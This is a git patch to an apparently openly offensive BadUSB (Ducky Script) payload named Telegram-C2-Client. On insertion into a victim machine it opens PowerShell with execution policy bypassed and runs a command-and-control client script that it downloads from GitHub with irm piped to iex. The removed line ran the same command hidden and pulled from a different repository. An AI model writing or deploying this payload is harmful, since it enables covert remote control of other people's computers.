From 871a17ca622340febf6ba2d163db0e467369c08c Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Thu, 30 Nov 2023 17:41:12 +0000 Subject: [PATCH] Update Telegram-C2-Client.txt --- Reverse Shells and C2/Telegram-C2-Client.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Reverse Shells and C2/Telegram-C2-Client.txt b/Reverse Shells and C2/Telegram-C2-Client.txt index 73a2565..c7d882d 100644 --- a/Reverse Shells and C2/Telegram-C2-Client.txt +++ b/Reverse Shells and C2/Telegram-C2-Client.txt @@ -18,11 +18,11 @@ REM 8. Replace TELEGRAM_BOT_API_TOKEN_HERE Below with your Telegram Bot API Toke REM some setup for dukie script DEFAULT_DELAY 100 -REM open powershell (remove "-W H" to show the window) +REM open powershell DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_BOT_API_TOKEN_HERE';irm https://raw.githubusercontent.com/beigeworm/Powershell-Tools-and-Toys/main/Command-and-Control/Telegram-C2-Client.ps1 | iex +STRING powershell -NoP -Ep Bypass -C $tg='TELEGRAM_BOT_API_TOKEN_HERE';irm https://raw.githubusercontent.com/beigeworm/PoshGram-C2/main/Telegram-C2-Client.ps1 | iex ENTER